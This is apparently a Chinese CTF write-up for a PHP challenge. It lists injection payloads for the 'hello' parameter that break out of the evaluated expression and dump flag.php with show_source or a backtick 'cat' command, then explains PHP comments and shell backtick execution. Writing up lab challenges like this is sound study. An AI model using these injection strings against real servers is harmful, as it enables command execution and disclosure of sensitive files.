题目内容:flag不在变量中
- 思路:通过构造$a的值来显示flag.php文件。
- ?hello=file("flag.php")
- ?hello=1);show_source('flag.php');//
- ?hello=);echo `cat ./flag.php`;//
- 学习到的知识
- php注释是//
- php在linux解析,可以在`,即倒引号中执行linux命令
- `command` 倒引号 (backticks)
在前面的单双引号,括住的是字串,但如果该字串是一列命令列,会怎样?答案是不会执行。要处理这种情况,我们得用倒单引号来做。
fdv=`date +%F`echo "Today $fdv"
在倒引号内的 date +%F 会被视为指令,执行的结果会带入 fdv 变数中。 - show_source()函数和highlight_file函数
- 两个函数一个意义。对文件PHP语法进行高亮显示。当使用函数时,整个文件都将被显示,包括密码和其他敏感信息。